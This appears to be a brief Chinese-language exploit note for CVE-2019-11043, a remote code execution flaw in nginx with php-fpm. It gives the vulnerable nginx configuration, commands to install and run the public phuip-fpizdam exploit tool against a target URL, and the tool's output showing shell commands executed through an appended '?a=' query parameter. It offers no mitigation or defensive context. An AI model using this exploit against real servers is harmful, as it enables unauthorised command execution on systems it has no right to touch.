CVE-2019-11043 nginx+php-fpm RCE

# CVE-2019-11043 nginx+php-fpm RCE

漏洞环境：
如果网络服务器运行nginx + php-fpm，并且nginx具有类似的配置
“`
location ~ [^/]\.php(/|$) {
…
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php:9000;
…
}
“`
Exp工具准备:
“`
go install github.com/neex/phuip-fpizdam
phuip-fpizdam [url]
或者
git clone https://github.com/neex/phuip-fpizdam
go build
phuip-fpizdam [url]
“`
输出：
“`
Base status code is 200
Status code 500 for qsl=1745, adding as a candidate
The target is probably vulnerable. Possible QSLs: [1735 1740 1745]
Attack params found: –qsl 1735 –pisos 126 –skip-detect
Trying to set “session.auto_start=0″…
Detect() returned attack params: –qsl 1735 –pisos 126 –skip-detect <-- REMEMBER THIS Performing attack using php.ini settings... Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs Trying to cleanup /tmp/a... Done! ``` 代码执行： ``` ?a=
“`